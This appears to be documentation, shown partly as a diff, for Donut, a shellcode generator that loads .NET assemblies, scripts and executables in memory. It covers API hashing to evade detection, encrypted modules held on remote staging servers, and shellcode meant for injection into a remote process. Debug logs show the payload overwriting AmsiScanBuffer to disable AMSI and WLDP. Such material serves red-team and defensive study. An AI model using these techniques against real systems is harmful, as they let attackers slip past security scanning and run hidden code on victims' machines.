267 <span style='color:#603000; '>WCHAR</span> param<span style='color:#808030; '>[</span>DONUT_MAX_PARAM<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters for DLL/EXE</span>
268 <span style='color:#603000; '>CHAR</span> sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// random string to verify decryption</span>
269 ULONG64 mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption was ok</span>
270 ULONG64 len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of EXE/DLL/XSL/JS/VBS file</span>
271 <span style='color:#603000; '>BYTE</span> data<span style='color:#808030; '>[</span><span style='color:#008c00; '>4</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// data of EXE/DLL/XSL/JS/VBS file</span>
272 <span style='color:#800080; '>}</span> DONUT_MODULE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_MODULE<span style='color:#800080; '>;</span>
273 </pre>
274
275 <h3>API Hashing</h3>
276
277 <p>A hash function called <em>Maru</em> is used to resolve the address of API at runtime. It uses a Davies-Meyer construction and the SPECK block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5 except only 32-bits of the string length are stored in the buffer instead of 64-bits. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance and cannot be used for detection of Donut. Future releases will likely support alternative methods of resolving address of API to decrease chance of detection.</p>
278
279 <h3>Encryption</h3>
280
281 <p>The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.</p>
282
283 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CRYPT <span style='color:#800080; '>{</span>
284 <span style='color:#603000; '>BYTE</span> mk<span style='color:#808030; '>[</span>DONUT_KEY_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// master key</span>
285 <span style='color:#603000; '>BYTE</span> ctr<span style='color:#808030; '>[</span>DONUT_BLK_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// counter + nonce</span>
286 <span style='color:#800080; '>}</span> DONUT_CRYPT<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CRYPT<span style='color:#800080; '>;</span>
287 </pre>
288
289 <p>Chaskey, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a <var>Module</var> or an <var>Instance</var> at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key which is stored in the donut payload. </p>
290
291 <h3>Debugging payload</h3>
292
293 <p>The payload is capable of displaying detailed information about each step executing a file in-memory and can be useful in tracking down bugs. To build a debug-enabled executable, specify the debug label with nmake/make for both donut.c and payload.c.</p>
294
295 <pre>
296 nmake debug -f Makefile.msvc
297 make debug -f Makefile.mingw
298 </pre>
299
300 <p>Use donut to create a payload as you normally would and a file called <code>instance</code> will be saved to disk.</p>
301
302 <pre>
303 c:\hub\donut>donut -fClass1.dll -cTestClass -mRunProcess -pcalc.exe,notepad.exe
304
305 [ Donut shellcode generator v0.9.2
306 [ Copyright (c) 2019 TheWover, Odzhan
307
308 DEBUG: donut.c:822:DonutCreate(): Entering.
309 DEBUG: donut.c:824:DonutCreate(): Validating configuration and path of file
310 DEBUG: donut.c:840:DonutCreate(): Validating instance type
311 DEBUG: donut.c:880:DonutCreate(): Validating architecture
312 DEBUG: donut.c:277:get_file_info(): Entering.
313 DEBUG: donut.c:286:get_file_info(): Checking extension of Class1.dll
314 DEBUG: donut.c:293:get_file_info(): Extension is ".dll"
315 DEBUG: donut.c:320:get_file_info(): Module is DLL
316 DEBUG: donut.c:327:get_file_info(): Mapping Class1.dll into memory
317 DEBUG: donut.c:222:map_file(): Reading size of file : Class1.dll
318 DEBUG: donut.c:231:map_file(): Opening Class1.dll
319 DEBUG: donut.c:241:map_file(): Mapping 3072 bytes for Class1.dll
320 DEBUG: donut.c:336:get_file_info(): Checking DOS header
321 DEBUG: donut.c:342:get_file_info(): Checking NT header
322 DEBUG: donut.c:348:get_file_info(): Checking IMAGE_DATA_DIRECTORY
323 DEBUG: donut.c:356:get_file_info(): Checking characteristics
324 DEBUG: donut.c:368:get_file_info(): COM Directory found
325 DEBUG: donut.c:384:get_file_info(): Runtime version : v4.0.30319
326 DEBUG: donut.c:395:get_file_info(): Leaving.
327 DEBUG: donut.c:944:DonutCreate(): Creating module
328 DEBUG: donut.c:516:CreateModule(): Entering.
329 DEBUG: donut.c:520:CreateModule(): Allocating 9504 bytes of memory for DONUT_MODULE
330 DEBUG: donut.c:544:CreateModule(): Domain : TPYTXT7T
331 DEBUG: donut.c:549:CreateModule(): Class : TestClass
332 DEBUG: donut.c:552:CreateModule(): Method : RunProcess
333 DEBUG: donut.c:559:CreateModule(): Runtime : v4.0.30319
334 DEBUG: donut.c:584:CreateModule(): Adding "calc.exe"
335 DEBUG: donut.c:584:CreateModule(): Adding "notepad.exe"
336 DEBUG: donut.c:610:CreateModule(): Leaving.
337 DEBUG: donut.c:951:DonutCreate(): Creating instance
338 DEBUG: donut.c:621:CreateInstance(): Entering.
339 DEBUG: donut.c:624:CreateInstance(): Allocating space for instance
340 DEBUG: donut.c:631:CreateInstance(): The size of module is 9504 bytes. Adding to size of instance.
341 DEBUG: donut.c:643:CreateInstance(): Generating random key for instance
342 DEBUG: donut.c:649:CreateInstance(): Generating random key for module
343 DEBUG: donut.c:655:CreateInstance(): Generating random string to verify decryption
344 DEBUG: donut.c:661:CreateInstance(): Generating random IV for Maru hash
345 DEBUG: donut.c:666:CreateInstance(): Generating hashes for API using IV: 59e4ea34bad26f10
346 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : LoadLibraryA = 710C9DA8846AE821
347 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetProcAddress = 2334B1630D3B9C85
348 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetModuleHandleA = 5389E01382E0391
349 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualAlloc = 51EE6B0DB215095E
350 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualFree = F55A2169F30A6ED4
351 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualQuery = 22DB7628044F6E32
352 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualProtect = 688AA07FEF250016
353 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : Sleep = 5BF1C1B408CCA4A5
354 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : MultiByteToWideChar = 438AD242BBBC755
355 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetUserDefaultLCID = 33ED1B2C1A2F9EC7
356 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreate = 78AD2BFB55A5E7ED
357 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreateVector = 539F6582DE26F7BC
358 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayPutElement = 5057AD641F749DA0
359 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayDestroy = A63C510FF032080E
360 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetLBound = A37979CE2EEDDA6
361 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetUBound = 64A9C62452B8653C
362 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysAllocString = BFEEAAB6CE6017FB
363 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysFreeString = E6FD34B03A2701F6
364 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : LoadTypeLib = 2A33214873ADC58C
365 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCrackUrlA = 1ADE3553184C68E1
366 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetOpenA = 1DEDE3D32F2FCD3
367 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetConnectA = 781FD6B18C99CAD2
368 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetSetOptionA = 13EC8A292778FC3F
369 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetReadFile = 8D16E60E7C2E582A
370 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCloseHandle = C28E8A3AABB2A755
371 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpOpenRequestA = 6C5189610A8545F5
372 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpSendRequestA = 4DFA0D985988D31
373 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpQueryInfoA = ED09A37256B27F04
374 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CorBindToRuntime = FD669FABED4C6B7
375 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CLRCreateInstance = 56B7AC5C110570B5
376 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoInitializeEx = 3733F4734D12D7C
377 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoCreateInstance = FCB3EAC51E43319B
378 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoUninitialize = 908A347B45C6E4A2
379 DEBUG: donut.c:694:CreateInstance(): Copying GUID structures and DLL strings for loading .NET assemblies
380 DEBUG: donut.c:791:CreateInstance(): Copying module data to instance
381 DEBUG: donut.c:796:CreateInstance(): encrypting instance
382 DEBUG: donut.c:808:CreateInstance(): Leaving.
383 DEBUG: donut.c:959:DonutCreate(): Saving instance to file
384 DEBUG: donut.c:992:DonutCreate(): PIC size : 33050
385 DEBUG: donut.c:999:DonutCreate(): Inserting opcodes
386 DEBUG: donut.c:1035:DonutCreate(): Copying 15218 bytes of x86 + amd64 shellcode
387 DEBUG: donut.c:259:unmap_file(): Unmapping
388 DEBUG: donut.c:262:unmap_file(): Closing
389 DEBUG: donut.c:1061:DonutCreate(): Leaving.
390 [ Instance type : PIC
391 [ Module file : "Class1.dll"
392 [ File type : .NET DLL
393 [ Class : TestClass
394 [ Method : RunProcess
395 [ Parameters : calc.exe,notepad.exe
396 [ Target CPU : x86+AMD64
397 [ Shellcode : "payload.bin"
398
399 DEBUG: donut.c:1069:DonutDelete(): Entering.
400 DEBUG: donut.c:1088:DonutDelete(): Leaving.
401 </pre>
402
403 <p>Pass the instance as a parameter to payload.exe and it will run on the host system as if in a target environment.</p>
404
405 <pre>
406 c:\hub\donut\payload>payload ..\instance
407 Running...
408 DEBUG: payload.c:45:ThreadProc(): Maru IV : 1899033E0863343E
409 DEBUG: payload.c:48:ThreadProc(): Resolving address for VirtualAlloc() : 9280348A6A2AFA7
410 DEBUG: payload.c:52:ThreadProc(): Resolving address for VirtualAlloc() : 3A49032E4107D985
411 DEBUG: payload.c:61:ThreadProc(): VirtualAlloc : 77535ED0 VirtualFree : 77535EF0
412 DEBUG: payload.c:63:ThreadProc(): Allocating 17800 bytes of RW memory
413 DEBUG: payload.c:70:ThreadProc(): Copying 17800 bytes of data to memory 008D0000
414 DEBUG: payload.c:74:ThreadProc(): Zero initializing PDONUT_ASSEMBLY
415 DEBUG: payload.c:82:ThreadProc(): Decrypting 17800 bytes of instance
416 DEBUG: payload.c:89:ThreadProc(): Generating hash to verify decryption
417 DEBUG: payload.c:91:ThreadProc(): Instance : c16c69caa83fb13f | Result : c16c69caa83fb13f
418 DEBUG: payload.c:98:ThreadProc(): Resolving LoadLibraryA
419 DEBUG: payload.c:104:ThreadProc(): Loading ole32.dll ...
420 DEBUG: payload.c:104:ThreadProc(): Loading oleaut32.dll ...
421 DEBUG: payload.c:104:ThreadProc(): Loading wininet.dll ...
422 DEBUG: payload.c:104:ThreadProc(): Loading mscoree.dll ...
423 DEBUG: payload.c:108:ThreadProc(): Resolving 33 API
424 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 066A0ED9815D3C92
425 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F3569749C64E1DA5
426 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09280348A6A2AFA7
427 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3A49032E4107D985
428 DEBUG: payload.c:111:ThreadProc(): Resolving API address for FDE50FEB629EB834
429 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4A4C764EFA89A84F
430 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5D388BA18E017E53
431 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4EA2B25D8FAABD2B
432 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F1D278132E49F050
433 DEBUG: payload.c:111:ThreadProc(): Resolving API address for D05386A0F8FF7CAD
434 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8121B63764A390A6
435 DEBUG: payload.c:111:ThreadProc(): Resolving API address for EB2BFAA408124470
436 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 11B666F77E7303F6
437 DEBUG: payload.c:111:ThreadProc(): Resolving API address for E8BD6B7A99981E38
438 DEBUG: payload.c:111:ThreadProc(): Resolving API address for DE78E211DE61998B
439 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09D967C5479A0F9F
440 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6CA1D167C2BFFA9A
441 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AD11F6324A205C5E
442 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5EAEF345362A2811
443 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A0CC0DC36E8EDD2C
444 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A4241EDCC8B14F85
445 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 756CEB8FF481A72E
446 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8116A255193A09CA
447 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AB14A786531404A1
448 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 1CF4A93D6896380A
449 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 61B393CC2DE33733
450 DEBUG: payload.c:111:ThreadProc(): Resolving API address for ADAF62D44179684A
451 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 7F9591B7380CD749
452 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3CC76B29D676544F
453 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 725AA978FD2B1255
454 DEBUG: peb.c:87:FindExport(): 725aa978fd2b1255 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx
455 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
456 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx)
457 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6C0F670F3C85A407
458 DEBUG: peb.c:87:FindExport(): 6c0f670f3c85a407 is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance
459 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
460 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance)
461 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 2996694CA69B44E8
462 DEBUG: peb.c:87:FindExport(): 2996694ca69b44e8 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize
463 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
464 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize)
465 DEBUG: payload.c:127:ThreadProc(): Using module embedded in instance
466 DEBUG: inmem_dotnet.c:43:LoadAssembly(): Using module embedded in instance
467 DEBUG: inmem_dotnet.c:51:LoadAssembly(): CLRCreateInstance
468 DEBUG: inmem_dotnet.c:59:LoadAssembly(): ICLRMetaHost::GetRuntime("v4.0.30319")
469 DEBUG: inmem_dotnet.c:66:LoadAssembly(): ICLRRuntimeInfo::IsLoadable
470 DEBUG: inmem_dotnet.c:70:LoadAssembly(): ICLRRuntimeInfo::GetInterface
471 DEBUG: inmem_dotnet.c:78:LoadAssembly(): HRESULT: 00000000
472 DEBUG: inmem_dotnet.c:100:LoadAssembly(): ICorRuntimeHost::Start
473 DEBUG: inmem_dotnet.c:107:LoadAssembly(): ICorRuntimeHost::CreateDomain("TP7WFT9M")
474 DEBUG: inmem_dotnet.c:115:LoadAssembly(): IUnknown::QueryInterface
475 DEBUG: bypass.c:83:DisableAMSI(): Length of AmsiScanBuffer stub is 32 bytes.
476 DEBUG: bypass.c:89:DisableAMSI(): Overwriting AmsiScanBuffer
477 DEBUG: bypass.c:104:DisableAMSI(): Length of AmsiScanString stub is -16 bytes.
478 DEBUG: inmem_dotnet.c:123:LoadAssembly(): DisableAMSI OK
479 DEBUG: inmem_dotnet.c:127:LoadAssembly(): DisableWLDP OK
480 DEBUG: inmem_dotnet.c:134:LoadAssembly(): Copying 3072 bytes of assembly to safe array
481 DEBUG: inmem_dotnet.c:140:LoadAssembly(): AppDomain::Load_3
482 DEBUG: inmem_dotnet.c:147:LoadAssembly(): HRESULT : 00000000
483 DEBUG: inmem_dotnet.c:149:LoadAssembly(): Erasing assembly from memory
484 DEBUG: inmem_dotnet.c:155:LoadAssembly(): SafeArrayDestroy
485 DEBUG: inmem_dotnet.c:176:RunAssembly(): Using module embedded in instance
486 DEBUG: inmem_dotnet.c:184:RunAssembly(): Type is DLL
487 DEBUG: inmem_dotnet.c:255:RunAssembly(): SysAllocString("TestClass")
488 DEBUG: inmem_dotnet.c:259:RunAssembly(): SysAllocString("RunProcess")
489 DEBUG: inmem_dotnet.c:263:RunAssembly(): Assembly::GetType_2
490 DEBUG: inmem_dotnet.c:269:RunAssembly(): SafeArrayCreateVector(2 parameter(s))
491 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "calc.exe" as parameter 1
492 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "notepad.exe" as parameter 2
493 DEBUG: inmem_dotnet.c:292:RunAssembly(): Calling Type::InvokeMember_3
494 DEBUG: inmem_dotnet.c:306:RunAssembly(): Type::InvokeMember_3 : 00000000 : Success
495 DEBUG: inmem_dotnet.c:323:FreeAssembly(): Type::Release
496 DEBUG: inmem_dotnet.c:335:FreeAssembly(): Assembly::Release
497 DEBUG: inmem_dotnet.c:341:FreeAssembly(): AppDomain::Release
498 DEBUG: inmem_dotnet.c:347:FreeAssembly(): IUnknown::Release
499 DEBUG: inmem_dotnet.c:353:FreeAssembly(): ICorRuntimeHost::Stop
500 DEBUG: inmem_dotnet.c:356:FreeAssembly(): ICorRuntimeHost::Release
501 DEBUG: inmem_dotnet.c:362:FreeAssembly(): ICLRRuntimeInfo::Release
502 DEBUG: inmem_dotnet.c:368:FreeAssembly(): ICLRMetaHost::Release
503 DEBUG: payload.c:171:ThreadProc(): Erasing RW memory for instance
504 DEBUG: payload.c:174:ThreadProc(): Releasing RW memory for instance
505 </pre>
506
507 <p>Obviously you should be cautious with what files you decide to execute on your machine.</p>
508
509 </body>
510 </html>
+511
-0
docs/api.md less more
0
1 <html>
2 <body>
3
4 <h3>API</h3>
5
6 <ul>
7 <li><code>int DonutCreate(PDONUT_CONFIG pConfig)</code></li>
8 <li><code>int DonutDelete(PDONUT_CONFIG pConfig)</code></li>
9 </ul>
10
11 <p>When provided with a valid configuration, <code>DonutCreate</code> will generate a shellcode to execute a VBS/JS/EXE/DLL or XSL files in-memory. If the function returns <code>DONUT_ERROR_SUCCESS</code>, the configuration will contain three components:</p>
12
13 <ol>
14 <li>An encrypted <var>Instance</var></li>
15 <li>An encrypted <var>Module</var></li>
16 <li>A position-independent code (PIC) or shellcode with <var>Instance</var> embedded in it.</li>
17 </ol>
18
19 <p>The key to decrypt the <var>Module</var> is stored in the <var>Instance</var> so that if a module is discovered on a staging server by an adversary, it should not be possible to decrypt the contents without the instance. <code>DonutDelete</code> will release any memory allocated by a successful call to <code>DonutCreate</code>. The <var>Instance</var> will already be attached to the PIC ready for executing in-memory, but the module may require saving to disk if the PIC will retrieve it from a remote staging server.</p>
20
21 <h3>Configuration</h3>
22
23 <p>A configuration requires a target architecture (only x86 and x86-64 are currently supported), a path to a VBS/JS/EXE/DLL or XML file that will be executed in-memory by the shellcode, a namespace/class for a .NET assembly, including the name of a method to invoke and any parameters passed to the method. If the module will be stored on a staging server, a URL is required, but not a module name because that will be generated randomly.</p>
24
25 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CONFIG <span style='color:#800080; '>{</span>
26 <span style='color:#800000; font-weight:bold; '>int</span> arch<span style='color:#800080; '>;</span> <span style='color:#696969; '>// target architecture for shellcode </span>
27 <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of domain to create for assembly</span>
28 <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace</span>
29 <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to execute</span>
30 <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span><span style='color:#808030; '>(</span>DONUT_MAX_PARAM<span style='color:#808030; '>+</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#808030; '>*</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters passed to method, separated by comma or semi-colon</span>
31 <span style='color:#800000; font-weight:bold; '>char</span> file<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// assembly to create module from </span>
32 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to root path of where module will be on remote http server</span>
33 <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version to use.</span>
34 <span style='color:#800000; font-weight:bold; '>char</span> modname<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of module written to disk</span>
35
36 <span style='color:#800000; font-weight:bold; '>int</span> mod_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// .NET EXE/DLL, VBS,JS,EXE,DLL,XSL</span>
37 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_MODULE</span>
38 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>mod<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut module</span>
39
40 <span style='color:#800000; font-weight:bold; '>int</span> inst_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL</span>
41 uint64_t inst_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_INSTANCE</span>
42 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>inst<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut instance</span>
43
44 uint64_t pic_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of shellcode</span>
45 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>pic<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to PIC/shellcode</span>
46 <span style='color:#800080; '>}</span> DONUT_CONFIG<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CONFIG<span style='color:#800080; '>;</span>
47 </pre>
48
49 <table border="1">
50 <tr>
51 <th>Member</th>
52 <th>Description</th>
53 </tr>
54 <tr>
55 <td><code>arch</code></td>
56 <td>Indicates the type of assembly code to generate. <code>DONUT_ARCH_X86</code> and <code>DONUT_ARCH_X64</code> are self-explanatory. <code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both x86 and amd64. ARM64 will be supported at some point.</td>
57 </tr>
58 <tr>
59 <td><code>domain</code></td>
60 <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly.</td>
61 </tr>
62 <tr>
63 <td><code>cls</code></td>
64 <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</var></td>
65 </tr>
66 <tr>
67 <td><code>method</code></td>
68 <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
69 </tr>
70 <tr>
71 <td><code>param</code></td>
72 <td>Contains a list of parameters for the .NET method or DLL function. Each separated by semi-colon or comma.</td>
73 </tr>
74 <tr>
75 <td><code>file</code></td>
76 <td>The path of a supported file type: VBS/JS/EXE/DLL or XSL.</td>
77 </tr>
78 <tr>
79 <td><code>url</code></td>
80 <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should contain the server and path of where module will be stored. e.g: https://www.rogueserver.com/modules/</td>
81 </tr>
82 <tr>
83 <td><code>runtime</code></td>
84 <td>The CLR runtime version to use for the .NET assembly. If none is provided, donut will try read from meta header. If that fails, v4.0.30319 is used by default.</td>
85 </tr>
86 <tr>
87 <td><code>modname</code></td>
88 <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this will contain a randomly generated name for the module that should be used when saving the contents of <code>mod</code> to disk.</td>
89 </tr>
90 <tr>
91 <td><code>mod_type</code></td>
92 <td>Indicates the type of file detected by <code>DonutCreate</code>. For example, <code>DONUT_MODULE_VBS</code> indicates a VBScript file.</td>
93 </tr>
94 <tr>
95 <td><code>mod_len</code></td>
96 <td>The total size of the <var>Module</var> pointed to by <code>mod</code>.</td>
97 </tr>
98 <tr>
99 <td><code>mod</code></td>
100 <td>Points to encrypted <var>Module</var>. If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should be saved to file using the <code>modname</code> and accessible via HTTP server.</td>
101 </tr>
102 <tr>
103 <td><code>inst_type</code></td>
104 <td><code>DONUT_INSTANCE_PIC</code> indicates a self-contained payload which means the .NET assembly is embedded in executable code. <code>DONUT_INSTANCE_URL</code> indicates the .NET assembly is stored on a remote server with a URL embedded in the instance.</td>
105 </tr>
106 <tr>
107 <td><code>inst_len</code></td>
108 <td>The total size of the <var>Instance</var> pointed to by <code>inst</code>.</td>
109 </tr>
110 <tr>
111 <td><code>inst</code></td>
112 <td>Points to an encrypted <var>Instance</var> after a successful call to <code>DonutCreate</code>. Since it's already attached to the <code>pic</code>, this is only provided for debugging purposes.</td>
113 </tr>
114 <tr>
115 <td><code>pic_len</code></td>
116 <td>The size of data pointed to by <code>pic</code>.</td>
117 </tr>
118 <tr>
119 <td><code>pic</code></td>
120 <td>Points to executable code for the target architecture which also contains an instance. This should be injected into a remote process.</td>
121 </tr>
122 </table>
123
124 <p>Everything that follows here concerns internal workings of Donut and is not required to generate a payload.</p>
125
126 <h3>Instance</h3>
127
128 <p>The position-independent code will always contain an <var>Instance</var> which can be viewed simply as a configuration for the code itself. It will contain all the data that would normally be stored on the stack or in the <code>.data</code> and <code>.rodata</code> sections of an executable. Once the main code executes, it will decrypt the instance before attempting to resolve the address of API functions. If successful, it will check if an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the <code>sig</code> field is hashed using <var>Maru</var> and compared with the value of <code>mac</code>.</p>
129
130 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for an instance goes into the following structure</span>
131 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_INSTANCE <span style='color:#800080; '>{</span>
132 uint32_t len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of instance</span>
133 DONUT_CRYPT key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// decrypts instance</span>
134
135 uint64_t iv<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit initial value for maru hash</span>
136
137 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
138 uint64_t hash<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api hashes</span>
139 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>addr<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api addresses</span>
140 <span style='color:#696969; '>// include prototypes only if header included from payload.h</span>
141 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>ifdef</span><span style='color:#004a43; '> PAYLOAD_H</span>
142 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
143 <span style='color:#696969; '>// imports from kernel32.dll or kernelbase.dll</span>
